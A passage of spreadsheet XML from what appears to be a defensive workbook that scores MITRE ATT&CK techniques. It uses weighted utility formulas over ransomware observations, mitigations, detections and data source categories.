      <c r="AU7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75" spans="1:47" ht="34">
      <c r="A75" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B75" s="37">
        <f t="shared" si="1"/>
        <v>62.428598571428573</v>
      </c>
      <c r="C75" s="37" t="s">
        <v>292</v>
      </c>
      <c r="D75" s="50" t="s">
        <v>275</v>
      </c>
      <c r="E75" s="37" t="s">
        <v>293</v>
      </c>
      <c r="F75" s="37">
        <v>1</v>
      </c>
      <c r="G75" s="37">
        <v>1</v>
      </c>
      <c r="H75" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I75" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J75" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K75" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L75" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M75" s="37">
        <v>0</v>
      </c>
      <c r="N75" s="56">
        <v>0</v>
      </c>
      <c r="O75" s="56">
        <v>1</v>
      </c>
      <c r="P75" s="56">
        <v>0</v>
      </c>
      <c r="Q75" s="56">
        <v>0</v>
      </c>
      <c r="R75" s="57" t="s">
        <v>294</v>
      </c>
      <c r="S75" s="57">
        <v>5</v>
      </c>
      <c r="T75" s="57" t="s">
        <v>285</v>
      </c>
      <c r="U75" s="57">
        <v>7</v>
      </c>
      <c r="V75" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11904771428571428</v>
      </c>
      <c r="W75" s="37">
        <v>12</v>
      </c>
      <c r="X75" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y75" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z75" s="37">
        <v>1</v>
      </c>
      <c r="AA75" s="37">
        <v>0.01</v>
      </c>
      <c r="AB75" s="37">
        <v>0.01</v>
      </c>
      <c r="AC75" s="37"/>
      <c r="AD75" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE75" s="37" t="str" cm="1">
        <f t="array" ref="AE75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD75)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF75" s="37">
        <v>71</v>
      </c>
      <c r="AG75" s="37" t="str" cm="1">
        <f t="array" ref="AG75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH75" s="37">
        <v>71</v>
      </c>
      <c r="AI75" s="37" t="str" cm="1">
        <f t="array" ref="AI75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD75)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ75" s="37">
        <v>71</v>
      </c>
      <c r="AK75" s="37" t="str" cm="1">
        <f t="array" ref="AK75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL75" s="37">
        <v>71</v>
      </c>
      <c r="AM75" s="37" t="str" cm="1">
        <f t="array" ref="AM75">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD75)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN75" s="37">
        <v>0</v>
      </c>
      <c r="AO75" s="37">
        <v>0</v>
      </c>
      <c r="AP75" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ75" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>20.809532857142859</v>
      </c>
      <c r="AR75" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS75" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT75" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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76" spans="1:47" ht="68">
      <c r="A76" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B76" s="37">
        <f t="shared" si="1"/>
        <v>34.404761904761905</v>
      </c>
      <c r="C76" s="37" t="s">
        <v>295</v>
      </c>
      <c r="D76" s="50" t="s">
        <v>296</v>
      </c>
      <c r="E76" s="37"/>
      <c r="F76" s="37">
        <v>1</v>
      </c>
      <c r="G76" s="37">
        <v>1</v>
      </c>
      <c r="H76" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I76" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J76" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K76" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L76" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M76" s="37">
        <v>0</v>
      </c>
      <c r="N76" s="56">
        <v>1</v>
      </c>
      <c r="O76" s="56">
        <v>2</v>
      </c>
      <c r="P76" s="56">
        <v>0</v>
      </c>
      <c r="Q76" s="56">
        <v>1</v>
      </c>
      <c r="R76" s="57"/>
      <c r="S76" s="57">
        <v>0</v>
      </c>
      <c r="T76" s="57"/>
      <c r="U76" s="57">
        <v>0</v>
      </c>
      <c r="V76" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W76" s="37">
        <v>0</v>
      </c>
      <c r="X76" s="37">
        <v>0</v>
      </c>
      <c r="Y76" s="37">
        <v>0</v>
      </c>
      <c r="Z76" s="37">
        <v>4</v>
      </c>
      <c r="AA76" s="37">
        <v>0.04</v>
      </c>
      <c r="AB76" s="37">
        <v>0.04</v>
      </c>
      <c r="AC76" s="37"/>
      <c r="AD76" s="50" t="s">
        <v>297</v>
      </c>
      <c r="AE76" s="37" t="str" cm="1">
        <f t="array" ref="AE76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF76" s="37">
        <v>72</v>
      </c>
      <c r="AG76" s="37" t="str" cm="1">
        <f t="array" ref="AG76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH76" s="37">
        <v>72</v>
      </c>
      <c r="AI76" s="37" t="str" cm="1">
        <f t="array" ref="AI76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ76" s="37">
        <v>72</v>
      </c>
      <c r="AK76" s="37" t="str" cm="1">
        <f t="array" ref="AK76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD76)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL76" s="37">
        <v>72</v>
      </c>
      <c r="AM76" s="37" t="str" cm="1">
        <f t="array" ref="AM76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD76)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN76" s="37">
        <v>0</v>
      </c>
      <c r="AO76" s="37">
        <v>1</v>
      </c>
      <c r="AP76" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ76" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>11.468253968253968</v>
      </c>
      <c r="AR76" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS76" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT76" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU7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0.29686318972033254</v>
      </c>
    </row>
    <row r="77" spans="1:47" ht="34">
      <c r="A77" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B77" s="37">
        <f t="shared" si="1"/>
        <v>111.75686923809523</v>
      </c>
      <c r="C77" s="37" t="s">
        <v>298</v>
      </c>
      <c r="D77" s="50" t="s">
        <v>299</v>
      </c>
      <c r="E77" s="37"/>
      <c r="F77" s="37">
        <v>1</v>
      </c>
      <c r="G77" s="37">
        <v>2</v>
      </c>
      <c r="H77" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I77" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J77" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K77" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L77" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M77" s="37">
        <v>2.1898999999999998E-2</v>
      </c>
      <c r="N77" s="56">
        <v>1</v>
      </c>
      <c r="O77" s="56">
        <v>8</v>
      </c>
      <c r="P77" s="56">
        <v>2</v>
      </c>
      <c r="Q77" s="56">
        <v>1</v>
      </c>
      <c r="R77" s="57" t="s">
        <v>300</v>
      </c>
      <c r="S77" s="57">
        <v>5</v>
      </c>
      <c r="T77" s="57" t="s">
        <v>301</v>
      </c>
      <c r="U77" s="57">
        <v>11</v>
      </c>
      <c r="V77" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20952376190476188</v>
      </c>
      <c r="W77" s="37">
        <v>16</v>
      </c>
      <c r="X77" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Y77" s="37">
        <v>0.29090899999999997</v>
      </c>
      <c r="Z77" s="37">
        <v>12</v>
      </c>
      <c r="AA77" s="37">
        <v>0.12</v>
      </c>
      <c r="AB77" s="37">
        <v>0.12</v>
      </c>
      <c r="AC77" s="37"/>
      <c r="AD77" s="50" t="s">
        <v>159</v>
      </c>
      <c r="AE77" s="37" t="str" cm="1">
        <f t="array" ref="AE77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD77)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF77" s="37">
        <v>73</v>
      </c>
      <c r="AG77" s="37" t="str" cm="1">
        <f t="array" ref="AG77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH77" s="37">
        <v>73</v>
      </c>
      <c r="AI77" s="37" t="str" cm="1">
        <f t="array" ref="AI77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ77" s="37">
        <v>73</v>
      </c>
      <c r="AK77" s="37" t="str" cm="1">
        <f t="array" ref="AK77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL77" s="37">
        <v>73</v>
      </c>
      <c r="AM77" s="37" t="str" cm="1">
        <f t="array" ref="AM77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN77" s="37">
        <v>0</v>
      </c>
      <c r="AO77" s="37">
        <v>0</v>
      </c>
      <c r="AP77" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ77" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>37.252289746031742</v>
      </c>
      <c r="AR77" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS77" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT77" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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78" spans="1:47" ht="68">
      <c r="A78" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="B78" s="37">
        <f t="shared" si="1"/>
        <v>92.142948857142855</v>
      </c>
      <c r="C78" s="37" t="s">
        <v>302</v>
      </c>
      <c r="D78" s="50" t="s">
        <v>303</v>
      </c>
      <c r="E78" s="37"/>
      <c r="F78" s="37">
        <v>1</v>
      </c>
      <c r="G78" s="37">
        <v>1</v>
      </c>
      <c r="H78" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I78" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J78" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K78" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L78" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M78" s="37">
        <v>7.2199999999999999E-4</v>
      </c>
      <c r="N78" s="56">
        <v>0</v>
      </c>
      <c r="O78" s="56">
        <v>3</v>
      </c>
      <c r="P78" s="56">
        <v>0</v>
      </c>
      <c r="Q78" s="56">
        <v>1</v>
      </c>
      <c r="R78" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S78" s="57">
        <v>2</v>
      </c>
      <c r="T78" s="57" t="s">
        <v>304</v>
      </c>
      <c r="U78" s="57">
        <v>18</v>
      </c>
      <c r="V78" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20952361904761904</v>
      </c>
      <c r="W78" s="37">
        <v>20</v>
      </c>
      <c r="X78" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y78" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z78" s="37">
        <v>4</v>
      </c>
      <c r="AA78" s="37">
        <v>0.04</v>
      </c>
      <c r="AB78" s="37">
        <v>0.04</v>
      </c>
      <c r="AC78" s="37"/>
      <c r="AD78" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE78" s="37" t="str" cm="1">
        <f t="array" ref="AE78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD78)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF78" s="37">
        <v>74</v>
      </c>
      <c r="AG78" s="37" t="str" cm="1">
        <f t="array" ref="AG78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD78)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH78" s="37">
        <v>74</v>
      </c>
      <c r="AI78" s="37" t="str" cm="1">
        <f t="array" ref="AI78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD78)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ78" s="37">
        <v>74</v>
      </c>
      <c r="AK78" s="37" t="str" cm="1">
        <f t="array" ref="AK78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD78)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL78" s="37">
        <v>74</v>
      </c>
      <c r="AM78" s="37" t="str" cm="1">
        <f t="array" ref="AM78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD78)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN78" s="37">
        <v>0</v>
      </c>
      <c r="AO78" s="37">
        <v>7</v>
      </c>
      <c r="AP78" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="AQ78" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>30.714316285714286</v>
      </c>
      <c r="AR78" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS78" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AT78" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AU7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5.285719380952381</v>
      </c>
    </row>
    <row r="79" spans="1:47" ht="68">
      <c r="A79" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B79" s="37">
        <f t="shared" si="1"/>
        <v>30.1</v>
      </c>
      <c r="C79" s="37" t="s">
        <v>305</v>
      </c>
      <c r="D79" s="50" t="s">
        <v>306</v>
      </c>
      <c r="E79" s="37"/>
      <c r="F79" s="37">
        <v>1</v>
      </c>
      <c r="G79" s="37">
        <v>1</v>
      </c>
      <c r="H79" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I79" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J79" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K79" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L79" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M79" s="37">
        <v>0</v>
      </c>
      <c r="N79" s="56">
        <v>0</v>
      </c>
      <c r="O79" s="56">
        <v>0</v>
      </c>
      <c r="P79" s="56">
        <v>0</v>
      </c>
      <c r="Q79" s="56">
        <v>0</v>
      </c>
      <c r="R79" s="57"/>
      <c r="S79" s="57">
        <v>0</v>
      </c>
      <c r="T79" s="57"/>
      <c r="U79" s="57">
        <v>0</v>
      </c>
      <c r="V79" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W79" s="37">
        <v>0</v>
      </c>
      <c r="X79" s="37">
        <v>0</v>
      </c>
      <c r="Y79" s="37">
        <v>0</v>
      </c>
      <c r="Z79" s="37">
        <v>0</v>
      </c>
      <c r="AA79" s="37">
        <v>0</v>
      </c>
      <c r="AB79" s="37">
        <v>0</v>
      </c>
      <c r="AC79" s="37" t="s">
        <v>209</v>
      </c>
      <c r="AD79" s="50" t="s">
        <v>143</v>
      </c>
      <c r="AE79" s="37" t="str" cm="1">
        <f t="array" ref="AE79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD79)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF79" s="37">
        <v>75</v>
      </c>
      <c r="AG79" s="37" t="str" cm="1">
        <f t="array" ref="AG79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD79)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH79" s="37">
        <v>75</v>
      </c>
      <c r="AI79" s="37" t="str" cm="1">
        <f t="array" ref="AI79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD79)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ79" s="37">
        <v>75</v>
      </c>
      <c r="AK79" s="37" t="str" cm="1">
        <f t="array" ref="AK79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD79)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL79" s="37">
        <v>75</v>
      </c>
      <c r="AM79" s="37" t="str" cm="1">
        <f t="array" ref="AM79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD79)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN79" s="37">
        <v>0</v>
      </c>
      <c r="AO79" s="37"/>
      <c r="AP79" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ79" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>10.033333333333333</v>
      </c>
      <c r="AR79" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS79" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT79" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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80" spans="1:47" ht="51">
      <c r="A80" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B80" s="37">
        <f t="shared" si="1"/>
        <v>125.33861714285715</v>
      </c>
      <c r="C80" s="37" t="s">
        <v>307</v>
      </c>
      <c r="D80" s="50" t="s">
        <v>308</v>
      </c>
      <c r="E80" s="37"/>
      <c r="F80" s="37">
        <v>1</v>
      </c>
      <c r="G80" s="37">
        <v>1</v>
      </c>
      <c r="H80" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I80" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J80" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K80" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
